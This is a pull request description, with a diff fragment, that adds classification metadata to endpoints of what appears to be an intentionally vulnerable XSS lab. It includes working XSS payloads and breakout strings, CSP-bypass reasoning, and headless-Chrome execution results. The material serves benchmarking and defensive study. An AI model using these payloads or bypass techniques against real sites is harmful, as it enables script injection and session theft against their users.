   query = env.params.query.fetch("query", "")
 
@@ -271,7 +278,8 @@ end
 # fake check finishes it reads ?query from the URL and writes it via innerHTML —
 # the challenge screen is the DOM-XSS sink. Pure client-side, no server reflection.
 # Bypass: ?query=<img src=x onerror=alert(1)>
-Xssmaze.push("waf-facade-level8", "/waf-facade/level8/?query=a", "Cloudflare-style JS challenge interstitial whose 'verify' step is a DOM innerHTML sink")
+Xssmaze.push("waf-facade-level8", "/waf-facade/level8/?query=a", "Cloudflare-style JS challenge interstitial whose 'verify' step is a DOM innerHTML sink",
+  vuln: "dom", sources: ["location.search"], sinks: ["innerHTML"], delivery: ["query"], note: "the server response ignores the parameter entirely; the sink runs in a setTimeout about 600 ms after load")
 maze_get "/waf-facade/level8/" do |_env|
   "<!doctype html><html><head><meta charset='utf-8'>
   <title>Just a moment...</title></head><body>


### PR DESCRIPTION
Triages the 210 remaining untriaged endpoints in slice T4's 36 files, plus the
`params:` defects in those files. **Metadata only** — no handler, filter or HTML
was changed; every changed line is either an `Xssmaze.push(` line or a new
`vuln:` line.

## What changed

`vuln` / `sources` / `sinks` / `delivery` / `exploitable` / `note` for 210
endpoints. `reach` is derived, never set by hand.

| class | count |
|---|---|
| reflected-html | 122 |
| reflected-attr | 51 |
| reflected-js | 24 |
| dom | 6 |
| non-xss-control | 7 |

All 210 derive `reach: server` — nothing in this slice is fragment-, postMessage-
or window.name-only, so no request-only scanner is pointed at an input it cannot
reach.

Nine `params:` lists named a parameter the handler does not read. Found by
diffing each URL's query string *and* each handler's actual reads against the
declared list, then confirming against the handler body:

| endpoint | was | now |
|---|---|---|
| `edge-level2` | `["query"]` | `[":path"]` (reads `params.url["segment"]`) |
| `edge-level5` | `["query"]` | `["q1", "q2"]` |
| `edge-level7` | `["query"]` | `["a", "b", "c"]` |
| `headerinj-level6` | `["X-Debug"]` | `["X-Debug", "debug"]` (query gates the reflection) |
| `json-xss-level1` | `["query"]` | `["query", "callback"]` (callback is unfiltered too) |
| `realworld-level2` | `["query"]` | `["query", "debug"]` |
| `realworld-level4` | `["query"]` | `["tag", "attr"]` |
| `realworld-level5` | `["query"]` | `["search"]` |
| `realworld-level8` | `["query"]` | `["Referer"]` |

## Endpoints marked `exploitable: false` — please review individually

These change a benchmark's denominator, so each was confirmed in headless Chrome
using the lab's own `/beacon` execution oracle rather than by reasoning about the
policy. Four are CSP levels whose policy does not do what the level name claims.

| endpoint | why it cannot fire |
|---|---|
| `csp-bypass-level3` | `script-src 'unsafe-eval'` lists no `'unsafe-inline'`, nonce or host source, so the page's own inline `<script>` — the one holding the reflection and calling `eval` — never executes, and no injected script or handler can either. The value *is* reflected raw into a JS string; nothing runs it. |
| `csp-bypass-level4` | `default-src 'self'` blocks the `data:` iframe that would carry the payload, and `script-src 'self'` blocks the inline listener that would render it. Neither half of the postMessage round-trip runs. |
| `cspbypass-level3` | Same shape as `csp-bypass-level3`: `script-src 'self' 'unsafe-eval'` has no `'unsafe-inline'`, so the inline `<script>` holding the reflection never executes. |
| `nonce-level2` | `script-src 'nonce-X' 'unsafe-hashes'` lists **no hash source**, so `'unsafe-hashes'` enables nothing and the `onclick` holding the reflection never runs. The nonce is random per request, so an injected script cannot borrow it. |
| `json-xss-level2` | Payload reflected raw, but served `application/json`. |
| `json-xss-level3` | Served `application/json`, *and* quotes/backslashes are escaped, so it cannot even break its JSON string. |
| `realworld-level6` | Raw markup, but served `text/plain` — the level is named "content-type sniffing", which no modern browser does for `text/plain`. |

## Two levels that work, but not the way their comment says

Both stay `exploitable: true`; the `note:` carries the correction.

- **`cspbypass-level6`** — `script-src *` matches URL sources only. An injected
  inline `<script>` or event handler is still blocked; only an external
  `<script src=...>` runs. Verified: inline no-fire, handler no-fire, external FIRED.
- **`import-map-level6`** — the injected address is scoped to `/app/`, which never
  matches this page's own URL, so `import()` never resolves to it. The
  import-map hijack that works on levels 1/3/4/5 is dead here; a `</script>`
  breakout is the only route. Verified: level 1 data: address FIRED, level 6 no-fire.

## Verification

### 1. Build + `/stats` delta

`unclassified` went 420 → 210, i.e. exactly this slice; the 210 that remain are
slice T2's. Verified per-endpoint, not by arithmetic — all 210 of my names are
now classified, and no class outside `VULN_CLASSES` appears anywhere:

```
my slice size: 210
classes in my slice: {'reflected-html': 122, 'reflected-attr': 51, 'reflected-js': 24, 'non-xss-control': 7, 'dom': 6}
reach   in my slice: {'server': 210}
still unclassified : []
invariant failures : []
catalog classes    : {'unclassified': 210, 'dom': 183, 'reflected-attr': 195, 'reflected-html': 362,
                      'reflected-js': 73, 'non-xss-control': 20, 'csti': 5, 'stored': 10, 'prototype-pollution': 6}
outside closed set : []
```

The invariant check also asserted, across my slice: every `dom` entry has a
source and a sink, every non-exploitable entry has a note, and every
`non-xss-control` has `exploitable: false`.

### 2. Byte-landing spot checks (payload the metadata implies → context I labelled)

```
### attrctx-level1  reflected-attr
<html><body><input type="text" value="" onmouseover=alert(1) x=""></body></html>

### chain-level1  reflected-html  (single-pass 'script' strip rejoins)
<html><body><script>alert(1)</script></body></html>

### edge-level1  reflected-html  (%00 prefix skips the < > check)
<html><body>^@<svg onload=alert(1)></body></html>

### edge-level3  dom  (server-reflected -> JSON island -> innerHTML, no breakout)
  {"search": "<img src=x onerror=alert(1)>"}

### edge-level5  reflected-attr  q1+q2 concatenated into one title attr
<html><body><div title="" onmouseover=alert(1) x="">Content</div></body></html>

### jf-xss-level1  reflected-js  (letter-free payload survives intact)
<script>
      [][(![]+[])[+[]]]
    </script>

### markdown-level6  reflected-html  (a quote breaks the regex, raw markdown lands in body)
<!doctype html><html><body>![alt](/img/cat.png "x"><svg onload=alert(1)>")</body></html>

### timing-level6  reflected-js  (template literal)
  <script>var t = `Hello ${alert(1)}`;</script>

### polyglot-level3  reflected-html  (needs four encoding layers, not three)
  4 layers  %2525253C... -> <script>alert(1)</script>
  3 layers  %25253C...   -> Detect Special Character

### header-level4  reflected-html  delivery=cookie  (raw Cookie header echoed)
<svg onload=alert(1)>

### realworld-level5  reflected-html  (the parameter NAME is the reflection)
<div>Parameters: <svg onload=alert(1)></div>

### postmethod-level4  reflected-js  delivery=body
<html><body><script>var x = "";alert(1)//";</script></body></html>

### json-xss-level2 / realworld-level6  content types
Content-Type: application/json
Content-Type: text/plain
```

### 3. Execution checks — headless Chrome + the lab's `/beacon` oracle

A hit in the beacon log is proof the payload *ran*; these decide the
`exploitable` flags. 15/15 matched expectation:

```
token   maze                 expected  observed   verdict
cspb1   csp-bypass-level1    FIRE      FIRED      OK
cspb3   csp-bypass-level3    none      no-fire    OK
cspb4   csp-bypass-level4    none      no-fire    OK
cspb5   csp-bypass-level5    FIRE      FIRED      OK
cspx3   cspbypass-level3     none      no-fire    OK
cspx6i  cspbypass-level6     none      no-fire    OK    (inline blocked)
cspx6h  cspbypass-level6     none      no-fire    OK    (handler blocked)
cspx6e  cspbypass-level6     FIRE      FIRED      OK    (external script: the only route)
n2h     nonce-level2         none      no-fire    OK
n3e     nonce-level3         FIRE      FIRED      OK    (attr breakout + same-origin script)
n3h     nonce-level3         none      no-fire    OK
im1     import-map-level1    FIRE      FIRED      OK    (data: address -> dynamic-import)
im6     import-map-level6    none      no-fire    OK    (scope /app/ never matches)
e3      edge-level3          FIRE      FIRED      OK    (JSON island -> innerHTML, no breakout)
wf8     waf-facade-level8    FIRE      FIRED      OK
```

`waf-facade-level8` first showed no-fire because its sink is behind a 600 ms
`setTimeout` and `--screenshot` exits at load; re-run with
`--virtual-time-budget` it fires, which is also why its note flags the delay.

The three content-type controls were run against a **same-payload `text/html`
positive control**, so the no-fires are attributable to the Content-Type alone:

```
basic-level1  (POSITIVE CONTROL)   text/html          FIRED     OK
realworld-level6                   text/plain         no-fire   OK
json-xss-level2                    application/json   no-fire   OK
json-xss-level3                    application/json   no-fire   OK
```

### 4. Suite

```
crystal spec           193 examples, 0 failures, 0 errors, 0 pending
ameba                  206 inspected, 0 failures
crystal tool format --check   clean
```

## For the reviewer

- **`edge-level4` is `reflected-attr`, not `reflected-js`.** The value sits in a
  single-quoted JS string inside an `onclick`, which reads like `reflected-js`,
  but the merged `attr-event-*` levels classify exactly this shape as
  `reflected-attr`; I followed that precedent so the two categories aggregate
  together. Worth a look if you'd rather it went the other way — there are 5
  `eventhandler-xss-*` levels labelled the same way for the same reason.
- **`import-map-level1/3/4/5` are `dom`, not `reflected-html`.** The bytes land
  in a `<script type=importmap>` block, which is data, not executable JS, and a
  live `import()` sink executes a `data:` address with no breakout — the
  `maze.cr` carve-out for "a server-reflected literal that a live DOM sink then
  executes". Level 2 is `reflected-js` instead, because there the value hits a
  JS string literal first and the breakout happens before the import map exists.
- **`realworld-level5`'s `params: ["search"]` is a compromise.** The handler
  reflects every parameter *name*, not any value, so no params list is strictly
  right; I matched the URL and put the real instruction in the note.
- The brief said 208 endpoints; the files actually contain **210** distinct
  pushes (no duplicates), all 210 previously `unclassified`. I triaged all of them.
- Untouched, as instructed: `README.md`, `CHANGELOG.md`, `AGENTS.md`,
  `src/maze.cr`, `src/registry.cr`, `src/catalog.cr`, `src/server.cr`, `spec/**`,
  `solutions/**`. No file outside the T4 list needed editing.
